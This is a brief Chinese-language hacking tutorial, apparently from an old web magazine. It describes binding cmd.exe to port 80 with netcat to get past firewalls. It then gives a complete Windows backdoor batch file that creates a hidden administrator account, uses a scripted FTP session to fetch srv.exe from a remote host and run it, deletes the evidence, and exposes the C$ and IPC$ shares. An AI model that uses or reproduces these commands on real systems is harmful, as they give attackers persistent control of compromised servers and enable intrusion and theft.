一般的防火墙对web服务的限制少的很,所以我们可以从这里入手,这里需要用到端口重定向,简单的说就是web开的http服务有2个,一个是http本身,一个是remote shell 或是bindshell防火墙过滤其他一切port,禁止反向连接,我靠!简单的就是可以用nc。(netcat呵呵这个)把cmd.exe绑定到80端口上去。telnet www.xxx.com 80 然后就得到一个shell或!可以利用asp,php.cgi等代码写的后门,也可以作到相同的效果!
bat后门
如果是xnix服务器。没办法。。。
ms服务器:
backdoor.bat (批处理文件)
net user hacker windychild /add
net localgroup administrators hacker /add ...create super admin user
echo open www.xxx.com>c:\ftp.txt
echo xxx(用户名)>>c:\ftp.txt
echo xxxxxx(密码)>>c:\ftp.txt
echo get srv.exe>>c:\ftp.txt
echo bye>>c:\ftp.txt
ftp -s:c:\ftp.txt
copy srv.exe c:\winnt\
c:\winnt\srv.exe
del c:\ftp.txt
del c:\srv.exe ......可以自己设置木马或后门等
....或你可以写上开启3389服务,telnet的语句
其他,开放共享服务!
net share ipc=ipc$
net share hdc=c$
......
【责任编辑 李旭海】